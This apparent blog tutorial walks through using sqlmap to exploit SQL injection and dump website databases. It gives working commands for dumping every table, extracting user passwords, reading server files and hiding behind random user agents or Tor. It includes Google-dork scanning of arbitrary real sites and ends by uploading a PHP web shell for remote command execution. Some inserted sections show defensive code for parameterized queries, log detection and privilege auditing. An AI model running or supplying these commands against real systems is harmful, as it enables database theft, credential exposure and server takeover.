How to dump a database of a website free 2021

Introduction

Hello everyone. We’ve come up with another topic: how to dump the database of a website with the sqlmap tool. As you may recall, we explained the whole procedure for dumping a web application’s database using sqlmap in a prior article, and I believe you should review that article for a better understanding.

However, in this essay, we will go over all of the useful aspects of this application. We assume you’re already familiar with the SQL injection issue, so let’s get right to it.

Let’s take a closer look!!

In a recent article, we discussed how to use a Google Dork to discover a SQL injection issue in a web application. Here, however, we will use the following web application, which was created specifically for penetration testing. We simply added a single quote after the “cat=” parameter and received a MySQL syntax error, indicating that the web application is vulnerable to SQL injection.

http://testphp.vulnweb.com/listproducts.php?cat=1%27
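Why a single quote produces a database syntax error, and what removes the flaw, as an added example that is not code from the original article. SQLite stands in for the site's MySQL backend, and the table, rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, 1, "poster"), (2, 1, "print"), (3, 2, "frame")])
    return db

def list_products_concat(db, cat):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so a stray quote breaks the statement and the error reaches the page.
    sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def list_products_bound(db, cat):
    # Hardened pattern: check the expected type, then bind the value as data.
    if not cat.isdigit():
        return []
    sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (int(cat),))]

def probe(handler, value):
    """Run one request value; return ('ok', rows) or ('sql-error', message)."""
    db = make_db()
    try:
        return ("ok", handler(db, value))
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))

if __name__ == "__main__":
    for value in ("1", "1'"):
        print(repr(value), "concat:", probe(list_products_concat, value))
        print(repr(value), "bound: ", probe(list_products_bound, value))
```

The database error on the concatenated query is the same signal the article relies on; the bound version never lets the quote reach the SQL parser.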


Our previous article gave you a fast overview of how to utilise SQLite and the various tools it offers. If you’d like to read more about those tools, check out our earlier article. The command to dump the database is as follows. Currently, we’re using testphp.vulnweb.com for the demo.

Usage 🙂 !! sqlmap -u "<URL>" --dbs

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

All of the database’s names that appear in the web app can be seen here.

Dump All

For a complete database listing, use the following command. To use a new feature, simply add it to the command and run it.

Usage !! sqlmap -u "<URL>" -D <database name> --dump-all --batch

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --dump-all --batch

Done !! The result is in front of you and you can see that it has dumped all the tables in the “acuart” database at once.

Cookies

When the vulnerable page of an online application sits behind a login, sqlmap has to send the session “cookies” with its requests. If you don’t do this, the flaw won’t be found. We show this against the deliberately vulnerable “DVWA” web app.
If the web application returns user information after a random number is typed in, it may be vulnerable. Let’s take advantage of this chance.

Start your Burp Suite tool, as it will be critical in obtaining the current user’s cookies. Now intercept the request and copy the highlighted text in its entirety, as shown in the accompanying image.

Go back to the terminal, add the URL, add the cookie using the copied text, and execute the command to list the databases.

Usage 🙂 !! sqlmap -u "<URL>" --cookie <cookies> --dbs

sqlmap -u "http://192.168.21.17/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74" --dbs

Nice 🙂 !! As you can see it has dumped all the databases after meeting the requirements of this tool.

HTTP Request File

With this feature, we will try to dump the whole database using a file that contains an HTTP request. We intercept the request, save it in a text file, and use the sqlmap tool to attempt to find and exploit the vulnerability.

After copying the HTTP request, include it in a text file using any tool.

Check the below command which contains the file that we created ourselves and also gave the command to dump the database.

Usage 🙂 !! sqlmap -r <HTTP file> --dbs --dump-all --batch

sqlmap -r secnhack --dbs --dump-all --batch

After you run the command, you can see that all of the databases in the web application have been dumped.

Google Dork

We don’t need to run the dork on Google on its own because this feature comes with the sqlmap tool. In order to use it, we only need to add the “-g” option with our dork. It will automatically find any websites that match the dork and ask us if we want to test them for SQL injection.

sqlmap -g 'inurl:".php?cat="' --dbs

Nice 🙂 !! After selecting the Yes option, it tries to detect the SQL injection vulnerability in the web application and dumps the database if the application is vulnerable to SQL injection.

Random Agent

This option automatically changes the user agent after a specified period of time to a randomly selected one, thus hiding your real user agent. This will help us in making ourselves anonymous.

sqlmap -g 'inurl:".php?cat="' --dbs --random-agent
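From the defender's side: sqlmap's default User-Agent header begins with `sqlmap/`, and a randomized agent removes that signal, so log detection has to inspect the request parameters as well. This added example (not from the original article) runs both checks over constructed access-log lines; the rule names and patterns are illustrative assumptions, not a complete signature set.

```python
import re
from urllib.parse import urlsplit, unquote_plus

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*" '
                     r'\d{3} \S+ "[^"]*" "([^"]*)"$')

# Illustrative payload rules applied to each decoded parameter value.
PAYLOAD_RULES = {
    "stray-quote": re.compile(r"^\d+['\"]"),
    "union-select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "time-delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "boolean-test": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "schema-enum": re.compile(r"\binformation_schema\b", re.I),
}

# Constructed sample lines in combined log format (not real traffic).
T = "[10/Jan/2021:10:00:00 +0000]"
SAMPLE_LOG = [
    f'198.51.100.7 - - {T} "GET /listproducts.php?cat=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    f'203.0.113.9 - - {T} "GET /listproducts.php?cat=1%27 HTTP/1.1" 200 310 "-" "sqlmap/1.x (constructed sample)"',
    f'203.0.113.9 - - {T} "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 290 "-" "Opera/9.80 (Windows NT 6.1)"',
    f'203.0.113.9 - - {T} "GET /listproducts.php?cat=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Opera/9.80 (Windows NT 6.1)"',
    f'198.51.100.7 - - {T} "GET /search.php?q=rock+and+roll HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def classify(line):
    """Return (client_ip, [reasons]) for a log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, agent = m.groups()
    reasons = ["sqlmap-user-agent"] if agent.lower().startswith("sqlmap/") else []
    for pair in urlsplit(target).query.split("&"):
        value = unquote_plus(pair.partition("=")[2])
        for name, rule in PAYLOAD_RULES.items():
            if rule.search(value) and name not in reasons:
                reasons.append(name)
    return ip, reasons

def suspicious_clients(lines):
    """Group every matched reason by client address."""
    hits = {}
    for parsed in filter(None, map(classify, lines)):
        if parsed[1]:
            hits.setdefault(parsed[0], set()).update(parsed[1])
    return hits

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```

Grouping by client shows that the address first seen with the tool's own agent string keeps matching payload rules after the agent changes.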

Detection

The level controls how many payloads will be tried, and if sqlmap can’t find the injection, the risk should be increased. Both default to 1. You can change the level from 1 to 5 and the risk from 1 to 3.

sqlmap -r (Site Address) --dbs --risk=3 --level=5

Great 🙂 !! After increasing both the level and the risk, it completely dumps all the databases that exist in the web application.

Dump All

Now if you want to dump all the databases, their tables and columns at once, you can add the “--all” option to your command.

sqlmap -r (Site address) --all

That’s Nice 🙂 !! As you can see, even this has dumped the passwords of the users which are stored in the database.

Banner Grabbing

We can get the current version of the database running on the remote host machine by adding the “-b” option to our command.

sqlmap -r (site address) -b

Nice 🙂 !! Finally it has given us the details of the database running on remote host.

Current User

Some important things to look for when we want to get useful information from a database are the following: Execute the command below to get the list of users in the web application.

sqlmap -r (site address) --current-user

Current Database

The image below shows that we have successfully retrieved the current database of the web application.

sqlmap -r (site address) --current-db

Passwords

If you only want to get the passwords of the users available in the web application, you can add the “--passwords” option to your command.

sqlmap -r (site address) --passwords

Tor Service

Sqlmap provides a Tor option to make us completely anonymous. However, you can only take advantage of it when Tor is already installed on your Linux machine.

sqlmap -r (site address) --tor

Multiple Scans

We can perform multiple scans at once with this tool. But let’s see how it’s possible !! First we will create a file which contains all the URLs that we want to use.

Then we will pass the location of the created file with the “-m” option and try to dump the database.

sqlmap -m websites.txt --dbs

Nice 🙂 !! We finally got the database name of the first web application.

Done 🙂 !! Similarly, we can take help of this facility which will definitely help in saving our time.

Privileges

As we know, privileges define what the user is allowed to do, and we can check them with the following command.

sqlmap -r (site address) --privileges

Hmm 🙂 !! As you can see, it shows what privileges are available to the shubham user.

Read Files

Through the following features we can read the sensitive files present in the web application if we have the information of the root folder of the web application.

Usage 🙂 !! sqlmap -r <HTTP File> --file-read=<Location>

sqlmap -r /root/ --file-read=/var/www/html/users.txt

Great 🙂 !! As you can see we have received the sensitive user file without entering the remote host’s database properly.

Upload File

Our malicious php files can now be uploaded, and we can get the entire web server through a tool called sqlmap, which we will show you how to use. The first thing you need to do is make a malicious php file. In our case, we will use the code below to get the cmd shell of the target web server.

<?php system($_GET['c']); ?>

Let’s understand the below command: see the “--file-write” option, in which we have placed our malicious PHP file, and the “--file-dest” option, in which we add the path on the target web server where we want to upload the PHP file.

Usage 🙂 !! sqlmap -r <HTTP File> --file-write <Your File> --file-dest <Upload Location> --dbs

sqlmap -r /root/ --file-write=/root/hack.php --file-dest=/var/www/html/DVWA/vulnerabilities/sqli/hack.php --batch

OMG 🙂 !! Finally our malicious PHP file is successfully uploaded to the target web server and now we can access the web application server’s database through the browser and execute arbitrary commands.
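On MySQL, reading and writing server files through SQL statements requires the account's global FILE privilege and is limited by the secure_file_priv setting, so both are worth auditing on the database behind a web application. This added example (not part of the original article) checks constructed SHOW GRANTS output and a secure_file_priv value; the account names, paths and function names are assumptions.

```python
import posixpath
import re

GRANT_RE = re.compile(
    r"^GRANT (.+?) ON (\S+) TO (.+?)(?: WITH GRANT OPTION)?$", re.I)

# Constructed SHOW GRANTS output for two hypothetical accounts.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT ON `shop`.* TO 'webapp'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'legacy'@'%' WITH GRANT OPTION",
]

def _within(path, parent):
    # True when path equals parent or lies below it.
    path, parent = posixpath.normpath(path), posixpath.normpath(parent)
    return path == parent or path.startswith(parent.rstrip("/") + "/")

def file_access_findings(grants, secure_file_priv, web_root):
    """Return (kind, detail) findings.

    secure_file_priv: None models NULL (file import/export disabled),
    "" models an empty value (no directory restriction).
    """
    findings = []
    for line in grants:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        # FILE is a global privilege, so only *.* grants can carry it.
        if m.group(2) == "*.*" and privs & {"FILE", "ALL PRIVILEGES", "ALL"}:
            findings.append(("file-privilege", m.group(3)))
    if secure_file_priv == "":
        findings.append(("no-path-restriction", "secure_file_priv is empty"))
    elif secure_file_priv is not None and (
            _within(secure_file_priv, web_root)
            or _within(web_root, secure_file_priv)):
        findings.append(("path-overlaps-web-root", secure_file_priv))
    return findings

if __name__ == "__main__":
    for finding in file_access_findings(SAMPLE_GRANTS, "", "/var/www/html"):
        print(finding)
```

An application account that holds no FILE privilege, combined with secure_file_priv set to NULL or to a directory outside the web root, yields no findings.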
